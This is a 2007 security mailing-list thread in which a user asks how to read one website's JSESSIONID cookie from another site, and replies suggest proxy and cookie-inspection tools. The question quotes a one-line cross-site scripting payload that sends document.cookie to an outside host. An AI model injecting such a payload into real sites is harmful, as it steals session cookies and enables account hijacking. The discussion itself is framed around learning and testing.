RE: Getting cookies

["MARTIN Benoni" <benoni.martin () arcelor com>]

Cookie digger from foudstone might help you (free download)

-----Message d'origine-----
De : listbounce () securityfocus com [mailto:listbounce () securityfocus com] De la part de crazy frog crazy frog
Envoyé : mercredi 24 janvier 2007 17:44
À : Mac Mohan
Cc : security-basics () securityfocus com
Objet : Re: Getting cookies

HI,

You can use paros proxy for that.


On 1/24/07, Mac Mohan <security.mac () gmail com> wrote:
> Hi
>
> I am trying to do the application security of a web site. Apart from 
> that, i am trying to learn how things work actually. Kindly help me.
>
> Let's say two sites are opened in IE. I would like to get the cookies 
> of Site A after opening a page in Site B.
>
> Please let me know how to get the JSESSIONID value of the web site 
> from another totally different web site.
>
> I know the way to get the cookies of a page from cross site scripting 
> of the page through
>
> <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?&apos;
> +document.cookie;</script>
>
> but dont know how to get cookies of one site from another site...
>
> Is this possible?
>
> Kindly let me know
>
> -thanks 'n' regards
> Mac


--
---------------------------------------
http://www.secgeeks.com
get a blog on secgeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secgeeks.com/node/feed
Submit you security articles,send them to secgeek () secgeeks com

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------